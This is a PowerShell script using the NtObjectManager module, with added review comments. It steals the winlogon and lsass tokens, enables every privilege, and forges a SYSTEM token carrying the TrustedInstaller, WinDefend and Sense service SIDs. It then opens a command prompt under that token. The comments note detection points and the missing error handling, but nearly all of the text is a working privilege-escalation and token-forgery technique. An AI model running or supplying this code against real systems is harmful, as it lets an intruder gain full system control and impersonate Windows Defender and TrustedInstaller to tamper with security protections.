# uses NtObjectManager module
# quick example code to craft a token containing WinDefend, TrustedInstaller and Sense token...
# https://github.com/rweijnen/Posh-Snippets/blob/master/ImpersonateWinDefend.ps1
#
# Review notes (what the script does, as written, and where a defender would see it):
#  - It reads the tokens of winlogon and lsass via Get-NtTokenFromProcess, impersonates each on
#    the current thread, enables every privilege that is currently disabled, then creates a new
#    primary SYSTEM token with New-NtToken whose group list includes the service SIDs of
#    TrustedInstaller, WinDefend and Sense, and finally starts cmd.exe with a duplicate of it.
#  - Every step is a plain cmdlet/method call; nothing is obfuscated. NOTE(review): obtaining the
#    tokens presumably requires opening winlogon and lsass, so process-handle auditing on those
#    two processes, plus process-creation telemetry showing cmd.exe started with a non-standard
#    token, are the natural observation points — confirm the exact access rights against the
#    NtObjectManager implementation, they are not visible here.
#  - There is no error handling: if Get-NtTokenFromProcess or Impersonate() fails, the later
#    .Revert()/.Dispose() calls operate on $null and fail too. The script also does not check
#    that the caller has the rights needed for the first impersonation step.
#
# First get SYSTEM token via Winlogon
# get winlogon pid
$winLogonPid = (get-process winlogon).id
# get winlogon token
$winLogonToken = Get-NtTokenFromProcess $winLogonPid
# impersonate winlogon
# $current is a pseudo handle to the calling thread; the impersonation contexts below are
# reverted in reverse order at the end of the script.
$current = Get-NtThread -Current -PseudoHandle
$contextWinLogon = $current.Impersonate($winLogonToken)
# Then get LSASS token to get more privileges
# get lsass pid
$lsasPid = (Get-Process LSASS).Id
# get lsas token
$lsasToken = Get-NtTokenFromProcess $lsasPid
# impersonate lsas
$contextLsas = $current.Impersonate($lsasToken)
# Collect the names of privileges that are present but not enabled, then enable each one.
# NOTE(review): Get-NtTokenPrivilege / Enable-NtTokenPrivilege are called without a -Token
# argument; presumably they act on the thread's current (impersonated lsass) token — confirm.
$disabledPrivileges = Get-NtTokenPrivilege | where {-not $_.Enabled } | select -Expand Name
ForEach ($priv in $disabledPrivileges)
{
Enable-NtTokenPrivilege -Privilege $priv
}
# enable all privileges, just because we can and might be useful for future purposes
# Parameters for the new token, splatted into New-NtToken below:
#  User       - SYSTEM ('SY')
#  TokenType  - Primary
#  Privileges - the explicit list below (not derived from the impersonated token)
#  Groups     - well-known SIDs plus the three service SIDs resolved via Get-NtSid
$tokenParams = @{
User = 'SY' # SYSTEM
TokenType = 'Primary'
Access = 'MaximumAllowed'
IntegrityLevel = 'System'
Privileges = @(
'SeCreateTokenPrivilege',
'SeAssignPrimaryTokenPrivilege',
'SeLockMemoryPrivilege',
'SeIncreaseQuotaPrivilege',
'SeMachineAccountPrivilege',
'SeTcbPrivilege',
'SeSecurityPrivilege',
'SeTakeOwnershipPrivilege',
'SeLoadDriverPrivilege',
'SeSystemProfilePrivilege',
'SeSystemTimePrivilege',
'SeProfileSingleProcessPrivilege',
'SeIncreaseBasePriorityPrivilege',
'SeCreatePageFilePrivilege',
'SeCreatePermanentPrivilege',
'SeBackupPrivilege',
'SeRestorePrivilege',
'SeShutdownPrivilege',
'SeDebugPrivilege',
'SeAuditPrivilege',
'SeSystemEnvironmentPrivilege',
'SeChangeNotifyPrivilege',
'SeRemoteShutdownPrivilege',
'SeUndockPrivilege',
'SeSyncAgentPrivilege',
'SeEnableDelegationPrivilege',
'SeManageVolumePrivilege',
'SeImpersonatePrivilege',
'SeCreateGlobalPrivilege',
'SeTrustedCredmanAccessPrivilege',
'SeRelabelPrivilege',
'SeIncreaseWorkingSetPrivilege',
'SeTimeZonePrivilege',
'SeCreateSymbolicLinkPrivilege',
'SeDelegateSessionUserImpersonatePrivilege'
)
Groups = @(
'BA', #BUILTIN\ADMINISTRATORS
'WD', #EVERYONE
'S-1-5-6', #NT AUTHORITY\SERVICE
'S-1-5-11', #NT AUTHORITY\Authenticated Users
'S-1-5-15', #NT AUTHORITY\This Organization
'S-1-5-32-545', #BUILTIN\Users
# Service SIDs are resolved by name at runtime; these three are what make the resulting
# process appear as a member of the Defender / TrustedInstaller / Sense service groups.
$(Get-NtSid -ServiceName "TrustedInstaller"),
$(Get-NtSid -ServiceName "WinDefend"),
$(Get-NtSid -ServiceName "Sense")
)
}
# Create a new NT token with the specified parameters
$token = New-NtToken @tokenParams
# New-Win32Process is given an impersonation-level duplicate rather than the primary token itself.
$dupToken = Copy-NtToken -Token $token -ImpersonationLevel Impersonation -Access MaximumAllowed
New-Win32Process -CommandLine "cmd.exe /k echo **WINDOWS DEFENDER COMMAND PROMPT** && whoami /all" -Token $dupToken
# Both token handles are released immediately after the child process has been created.
$dupToken.Dispose()
$token.Dispose()
#revert
# Undo the two impersonations in reverse order (lsass first, then winlogon), then release the
# thread pseudo handle.
$contextLsas.Revert()
$contextLsas.Dispose()
$contextWinLogon.Revert()
$contextWinLogon.Dispose()
$current.Dispose()